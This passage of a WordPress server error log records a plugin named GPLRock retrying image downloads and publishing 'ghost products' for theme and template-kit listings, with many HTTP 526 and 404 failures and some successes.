UTC] GPLRock: Image download failed for product notify-notification-email-themebuilder-access (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:41:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/notify---notification-email--themebuilder-access-29002.webp for product notify-notification-email-themebuilder-access after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:41:55 UTC] GPLRock: Image download failed for product notify-notification-email-themebuilder-access (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:41:58 UTC] GPLRock: Image download failed for product notify-notification-email-themebuilder-access (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/notify---notification-email--themebuilder-access-29002.webp for product notify-notification-email-themebuilder-access after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:00 UTC] GPLRock WARNING: Image download failed for product notify-notification-email-themebuilder-access. URL: https://meldwp.com/wp-content/uploads/notify---notification-email--themebuilder-access-29002.webp [05-Apr-2026 02:42:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: notify-notification-email-themebuilder-access [05-Apr-2026 02:42:00 UTC] GPLRock: Image download failed for product psychare-wordpress-theme-for-psychologists-life-coaches (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:02 UTC] GPLRock: Image download failed for product psychare-wordpress-theme-for-psychologists-life-coaches (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/psychare---wordpress-theme-for-psychologists--life-coaches-676.webp for product psychare-wordpress-theme-for-psychologists-life-coaches after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:04 UTC] GPLRock: Image download failed for product psychare-wordpress-theme-for-psychologists-life-coaches (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:06 UTC] GPLRock: Image download failed for product psychare-wordpress-theme-for-psychologists-life-coaches (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/psychare---wordpress-theme-for-psychologists--life-coaches-676.webp for product psychare-wordpress-theme-for-psychologists-life-coaches after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:08 UTC] GPLRock WARNING: Image download failed for product psychare-wordpress-theme-for-psychologists-life-coaches. URL: https://meldwp.com/wp-content/uploads/psychare---wordpress-theme-for-psychologists--life-coaches-676.webp [05-Apr-2026 02:42:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: psychare-wordpress-theme-for-psychologists-life-coaches [05-Apr-2026 02:42:08 UTC] GPLRock: Image download failed for product lemars-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:10 UTC] GPLRock: Image download failed for product lemars-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lemars---personal-blog-wordpress-theme-7962.webp for product lemars-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:13 UTC] GPLRock: Image download failed for product lemars-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:15 UTC] GPLRock: Image download failed for product lemars-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lemars---personal-blog-wordpress-theme-7962.webp for product lemars-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:17 UTC] GPLRock WARNING: Image download failed for product lemars-personal-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lemars---personal-blog-wordpress-theme-7962.webp [05-Apr-2026 02:42:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lemars-personal-blog-wordpress-theme [05-Apr-2026 02:42:17 UTC] GPLRock: Image download failed for product medicpress-medical-wordpress-theme-for-clinics-and-private-doctors (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:19 UTC] GPLRock: Image download failed for product medicpress-medical-wordpress-theme-for-clinics-and-private-doctors (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medicpress--medical-wordpress-theme-for-clinics-and-private-doctors-22183.webp for product medicpress-medical-wordpress-theme-for-clinics-and-private-doctors after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:21 UTC] GPLRock: Image download failed for product medicpress-medical-wordpress-theme-for-clinics-and-private-doctors (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:23 UTC] GPLRock: Image download failed for product medicpress-medical-wordpress-theme-for-clinics-and-private-doctors (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medicpress--medical-wordpress-theme-for-clinics-and-private-doctors-22183.webp for product medicpress-medical-wordpress-theme-for-clinics-and-private-doctors after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:25 UTC] GPLRock WARNING: Image download failed for product medicpress-medical-wordpress-theme-for-clinics-and-private-doctors. URL: https://meldwp.com/wp-content/uploads/medicpress--medical-wordpress-theme-for-clinics-and-private-doctors-22183.webp [05-Apr-2026 02:42:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: medicpress-medical-wordpress-theme-for-clinics-and-private-doctors [05-Apr-2026 02:42:26 UTC] GPLRock: Image download failed for product adam-minimal-responsive-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:28 UTC] GPLRock: Image download failed for product adam-minimal-responsive-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adam---minimal-responsive-portfolio-wordpress-theme-25253.webp for product adam-minimal-responsive-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:30 UTC] GPLRock: Image download failed for product adam-minimal-responsive-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:32 UTC] GPLRock: Image download failed for product adam-minimal-responsive-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adam---minimal-responsive-portfolio-wordpress-theme-25253.webp for product adam-minimal-responsive-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:34 UTC] GPLRock WARNING: Image download failed for product adam-minimal-responsive-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/adam---minimal-responsive-portfolio-wordpress-theme-25253.webp [05-Apr-2026 02:42:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adam-minimal-responsive-portfolio-wordpress-theme [05-Apr-2026 02:42:34 UTC] GPLRock: Image download failed for product artday-creative-artist-wordpress-shop (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:36 UTC] GPLRock: Image download failed for product artday-creative-artist-wordpress-shop (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artday---creative-artist-wordpress-shop-13043.webp for product artday-creative-artist-wordpress-shop after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:39 UTC] GPLRock: Image download failed for product artday-creative-artist-wordpress-shop (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:41 UTC] GPLRock: Image download failed for product artday-creative-artist-wordpress-shop (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artday---creative-artist-wordpress-shop-13043.webp for product artday-creative-artist-wordpress-shop after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:43 UTC] GPLRock WARNING: Image download failed for product artday-creative-artist-wordpress-shop. URL: https://meldwp.com/wp-content/uploads/artday---creative-artist-wordpress-shop-13043.webp [05-Apr-2026 02:42:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artday-creative-artist-wordpress-shop [05-Apr-2026 02:42:43 UTC] GPLRock: Image download failed for product facultic-online-education-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:45 UTC] GPLRock: Image download failed for product facultic-online-education-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/facultic---online-education-courses-wordpress-theme-19105.webp for product facultic-online-education-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:47 UTC] GPLRock: Image download failed for product facultic-online-education-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:49 UTC] GPLRock: Image download failed for product facultic-online-education-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/facultic---online-education-courses-wordpress-theme-19105.webp for product facultic-online-education-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:51 UTC] GPLRock WARNING: Image download failed for product facultic-online-education-courses-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/facultic---online-education-courses-wordpress-theme-19105.webp [05-Apr-2026 02:42:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: facultic-online-education-courses-wordpress-theme [05-Apr-2026 02:42:51 UTC] GPLRock: Image download failed for product lawyer-base-law-firm-attorney-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:54 UTC] GPLRock: Image download failed for product lawyer-base-law-firm-attorney-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lawyer-base---law-firm--attorney-wordpress-7038.webp for product lawyer-base-law-firm-attorney-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:42:56 UTC] GPLRock: Image download failed for product lawyer-base-law-firm-attorney-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:42:58 UTC] GPLRock: Image download failed for product lawyer-base-law-firm-attorney-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:43:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lawyer-base---law-firm--attorney-wordpress-7038.webp for product lawyer-base-law-firm-attorney-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:43:00 UTC] GPLRock WARNING: Image download failed for product lawyer-base-law-firm-attorney-wordpress. URL: https://meldwp.com/wp-content/uploads/lawyer-base---law-firm--attorney-wordpress-7038.webp [05-Apr-2026 02:43:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lawyer-base-law-firm-attorney-wordpress [05-Apr-2026 02:43:00 UTC] GPLRock: Image download failed for product nexbiz-it-business-and-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:43:02 UTC] GPLRock: Image download failed for product nexbiz-it-business-and-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:43:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nexbiz---it-business-and-services-wordpress-theme-778.webp for product nexbiz-it-business-and-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:43:05 UTC] GPLRock: Image download failed for product nexbiz-it-business-and-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:43:07 UTC] GPLRock: Image download failed for product nexbiz-it-business-and-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:43:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nexbiz---it-business-and-services-wordpress-theme-778.webp for product nexbiz-it-business-and-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:43:09 UTC] GPLRock WARNING: Image download failed for product nexbiz-it-business-and-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nexbiz---it-business-and-services-wordpress-theme-778.webp [05-Apr-2026 02:43:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nexbiz-it-business-and-services-wordpress-theme [05-Apr-2026 02:43:22 UTC] GPLRock: Image downloaded successfully for product medisale-medical-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-443b2c74.webp [05-Apr-2026 02:43:22 UTC] GPLRock: Using pre-downloaded image for product medisale-medical-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-443b2c74.webp [05-Apr-2026 02:43:22 UTC] GPLRock: Ghost product published with image - Product ID: medisale-medical-shop-elementor-template-kit [05-Apr-2026 02:43:23 UTC] GPLRock: Image downloaded successfully for product medisa-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6fe2591.webp [05-Apr-2026 02:43:23 UTC] GPLRock: Using pre-downloaded image for product medisa-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6fe2591.webp [05-Apr-2026 02:43:23 UTC] GPLRock: Ghost product published with image - Product ID: medisa-medical-elementor-template-kit [05-Apr-2026 02:43:25 UTC] GPLRock: Image downloaded successfully for product medipharma-pharmacy-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5da6f77d.webp [05-Apr-2026 02:43:25 UTC] GPLRock: Using pre-downloaded image for product medipharma-pharmacy-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5da6f77d.webp [05-Apr-2026 02:43:25 UTC] GPLRock: Ghost product published with image - Product ID: medipharma-pharmacy-medical-elementor-template-kit [05-Apr-2026 02:43:26 UTC] GPLRock: Image downloaded successfully for product medina-medical-health-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-112b9dba.webp [05-Apr-2026 02:43:26 UTC] GPLRock: Using pre-downloaded image for product medina-medical-health-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-112b9dba.webp [05-Apr-2026 02:43:26 UTC] GPLRock: Ghost product published with image - Product ID: medina-medical-health-elementor-template-kit [05-Apr-2026 02:43:28 UTC] GPLRock: Image downloaded successfully for product medilab-healthcare-clinical-laboratory-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7899ef72.webp [05-Apr-2026 02:43:28 UTC] GPLRock: Using pre-downloaded image for product medilab-healthcare-clinical-laboratory-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7899ef72.webp [05-Apr-2026 02:43:28 UTC] GPLRock: Ghost product published with image - Product ID: medilab-healthcare-clinical-laboratory-elementor-template-kit [05-Apr-2026 02:43:29 UTC] GPLRock: Image downloaded successfully for product mediku-health-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7aa05d9e.webp [05-Apr-2026 02:43:29 UTC] GPLRock: Using pre-downloaded image for product mediku-health-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7aa05d9e.webp [05-Apr-2026 02:43:29 UTC] GPLRock: Ghost product published with image - Product ID: mediku-health-medical-elementor-template-kit [05-Apr-2026 02:43:30 UTC] GPLRock: Image downloaded successfully for product medikor-medical-healthcare-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-916479f4.webp [05-Apr-2026 02:43:30 UTC] GPLRock: Using pre-downloaded image for product medikor-medical-healthcare-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-916479f4.webp [05-Apr-2026 02:43:30 UTC] GPLRock: Ghost product published with image - Product ID: medikor-medical-healthcare-elementor-template-kit [05-Apr-2026 02:43:32 UTC] GPLRock: Image downloaded successfully for product medikit-medical-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3eaf167c.webp [05-Apr-2026 02:43:32 UTC] GPLRock: Using pre-downloaded image for product medikit-medical-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3eaf167c.webp [05-Apr-2026 02:43:32 UTC] GPLRock: Ghost product published with image - Product ID: medikit-medical-template-kit [05-Apr-2026 02:43:33 UTC] GPLRock: Image downloaded successfully for product medific-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5dab946f.webp [05-Apr-2026 02:43:33 UTC] GPLRock: Using pre-downloaded image for product medific-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5dab946f.webp [05-Apr-2026 02:43:33 UTC] GPLRock: Ghost product published with image - Product ID: medific-medical-elementor-template-kit [05-Apr-2026 02:43:35 UTC] GPLRock: Image downloaded successfully for product medicate-health-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cc0d071.webp [05-Apr-2026 02:43:35 UTC] GPLRock: Using pre-downloaded image for product medicate-health-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cc0d071.webp [05-Apr-2026 02:43:35 UTC] GPLRock: Ghost product published with image - Product ID: medicate-health-medical-elementor-template-kit [05-Apr-2026 02:44:31 UTC] GPLRock: Image downloaded successfully for product donche-news-magazine-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9762a3c5.webp [05-Apr-2026 02:44:31 UTC] GPLRock: Using pre-downloaded image for product donche-news-magazine-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9762a3c5.webp [05-Apr-2026 02:44:31 UTC] GPLRock: Ghost product published with image - Product ID: donche-news-magazine-template-kit [05-Apr-2026 02:44:32 UTC] GPLRock: Image downloaded successfully for product donatenow-donation-charity-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e9b974ba.webp [05-Apr-2026 02:44:32 UTC] GPLRock: Using pre-downloaded image for product donatenow-donation-charity-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e9b974ba.webp [05-Apr-2026 02:44:32 UTC] GPLRock: Ghost product published with image - Product ID: donatenow-donation-charity-elementor-template-kit [05-Apr-2026 02:44:34 UTC] GPLRock: Image downloaded successfully for product dominus-tattoo-studio-elementor-template-kits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cbc48ec9.webp [05-Apr-2026 02:44:34 UTC] GPLRock: Using pre-downloaded image for product dominus-tattoo-studio-elementor-template-kits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cbc48ec9.webp [05-Apr-2026 02:44:34 UTC] GPLRock: Ghost product published with image - Product ID: dominus-tattoo-studio-elementor-template-kits [05-Apr-2026 02:44:35 UTC] GPLRock: Image downloaded successfully for product dometric-solar-renewable-energy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eda38819.jpg [05-Apr-2026 02:44:36 UTC] GPLRock: Using pre-downloaded image for product dometric-solar-renewable-energy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eda38819.jpg [05-Apr-2026 02:44:36 UTC] GPLRock: Ghost product published with image - Product ID: dometric-solar-renewable-energy-elementor-template-kit [05-Apr-2026 02:44:37 UTC] GPLRock: Image downloaded successfully for product dolan-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46fcd80b.webp [05-Apr-2026 02:44:37 UTC] GPLRock: Using pre-downloaded image for product dolan-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46fcd80b.webp [05-Apr-2026 02:44:37 UTC] GPLRock: Ghost product published with image - Product ID: dolan-personal-portfolio-elementor-template-kit [05-Apr-2026 02:44:39 UTC] GPLRock: Image downloaded successfully for product doctor-on-demand-online-consultations-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d0b63ea0.jpg [05-Apr-2026 02:44:39 UTC] GPLRock: Using pre-downloaded image for product doctor-on-demand-online-consultations-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d0b63ea0.jpg [05-Apr-2026 02:44:39 UTC] GPLRock: Ghost product published with image - Product ID: doctor-on-demand-online-consultations-elementor-template-kit [05-Apr-2026 02:44:40 UTC] GPLRock: Image downloaded successfully for product docle-digital-agency-services-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a807f549.jpg [05-Apr-2026 02:44:41 UTC] GPLRock: Using pre-downloaded image for product docle-digital-agency-services-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a807f549.jpg [05-Apr-2026 02:44:41 UTC] GPLRock: Ghost product published with image - Product ID: docle-digital-agency-services-template-kit [05-Apr-2026 02:44:42 UTC] GPLRock: Image downloaded successfully for product docar-repair-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cb9b8c9b.webp [05-Apr-2026 02:44:42 UTC] GPLRock: Using pre-downloaded image for product docar-repair-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cb9b8c9b.webp [05-Apr-2026 02:44:42 UTC] GPLRock: Ghost product published with image - Product ID: docar-repair-shop-elementor-template-kit [05-Apr-2026 02:44:43 UTC] GPLRock: Image downloaded successfully for product djompo-kit-senior-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a6af896.webp [05-Apr-2026 02:44:43 UTC] GPLRock: Using pre-downloaded image for product djompo-kit-senior-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a6af896.webp [05-Apr-2026 02:44:43 UTC] GPLRock: Ghost product published with image - Product ID: djompo-kit-senior-care-elementor-template-kit [05-Apr-2026 02:44:45 UTC] GPLRock: Image downloaded successfully for product djaen-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5f4a1d5e.webp [05-Apr-2026 02:44:45 UTC] GPLRock: Using pre-downloaded image for product djaen-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5f4a1d5e.webp [05-Apr-2026 02:44:45 UTC] GPLRock: Ghost product published with image - Product ID: djaen-restaurant-elementor-template-kit [05-Apr-2026 02:45:45 UTC] GPLRock: Image downloaded successfully for product solarix-solar-renewable-energy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1428573b.jpg [05-Apr-2026 02:45:45 UTC] GPLRock: Using pre-downloaded image for product solarix-solar-renewable-energy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1428573b.jpg [05-Apr-2026 02:45:45 UTC] GPLRock: Ghost product published with image - Product ID: solarix-solar-renewable-energy-elementor-template-kit [05-Apr-2026 02:45:46 UTC] GPLRock: Image downloaded successfully for product veera-multipurpose-woocommerce-themes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cf9a6f2c.jpg [05-Apr-2026 02:45:46 UTC] GPLRock: Using pre-downloaded image for product veera-multipurpose-woocommerce-themes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cf9a6f2c.jpg [05-Apr-2026 02:45:46 UTC] GPLRock: Ghost product published with image - Product ID: veera-multipurpose-woocommerce-themes [05-Apr-2026 02:45:48 UTC] GPLRock: Image downloaded successfully for product wpforms-webhooks-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed06d870.webp [05-Apr-2026 02:45:48 UTC] GPLRock: Using pre-downloaded image for product wpforms-webhooks-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed06d870.webp [05-Apr-2026 02:45:48 UTC] GPLRock: Ghost product published with image - Product ID: wpforms-webhooks-addon [05-Apr-2026 02:45:49 UTC] GPLRock: Image downloaded successfully for product fluentcrm-pro-email-marketing-automation (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-93adaad1.jpg [05-Apr-2026 02:45:49 UTC] GPLRock: Using pre-downloaded image for product fluentcrm-pro-email-marketing-automation: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-93adaad1.jpg [05-Apr-2026 02:45:49 UTC] GPLRock: Ghost product published with image - Product ID: fluentcrm-pro-email-marketing-automation [05-Apr-2026 02:45:51 UTC] GPLRock: Image downloaded successfully for product anarkali-fashion-shop-woocommerce-elementor-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ec6c0c89.png [05-Apr-2026 02:45:51 UTC] GPLRock: Using pre-downloaded image for product anarkali-fashion-shop-woocommerce-elementor-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ec6c0c89.png [05-Apr-2026 02:45:51 UTC] GPLRock: Ghost product published with image - Product ID: anarkali-fashion-shop-woocommerce-elementor-theme [05-Apr-2026 02:45:53 UTC] GPLRock: Image downloaded successfully for product marblex-marble-tiles-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-454d73b1.jpg [05-Apr-2026 02:45:53 UTC] GPLRock: Using pre-downloaded image for product marblex-marble-tiles-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-454d73b1.jpg [05-Apr-2026 02:45:53 UTC] GPLRock: Ghost product published with image - Product ID: marblex-marble-tiles-wordpress-theme [05-Apr-2026 02:45:55 UTC] GPLRock: Image downloaded successfully for product fooevents-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7181f74a.jpg [05-Apr-2026 02:45:55 UTC] GPLRock: Using pre-downloaded image for product fooevents-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7181f74a.jpg [05-Apr-2026 02:45:55 UTC] GPLRock: Ghost product published with image - Product ID: fooevents-for-woocommerce [05-Apr-2026 02:45:58 UTC] GPLRock: Image download failed for product pixelyoursite-pro-facebook-pixel-wordpress-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 02:46:02 UTC] GPLRock: Image download failed for product pixelyoursite-pro-facebook-pixel-wordpress-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 02:46:06 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/PixelYourSite-Pro-Facebook-pixel-WordPress-plugin.jpg for product pixelyoursite-pro-facebook-pixel-wordpress-plugin after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 02:46:08 UTC] GPLRock: Image download failed for product pixelyoursite-pro-facebook-pixel-wordpress-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 02:46:12 UTC] GPLRock: Image download failed for product pixelyoursite-pro-facebook-pixel-wordpress-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 02:46:16 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/PixelYourSite-Pro-Facebook-pixel-WordPress-plugin.jpg for product pixelyoursite-pro-facebook-pixel-wordpress-plugin after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 02:46:16 UTC] GPLRock 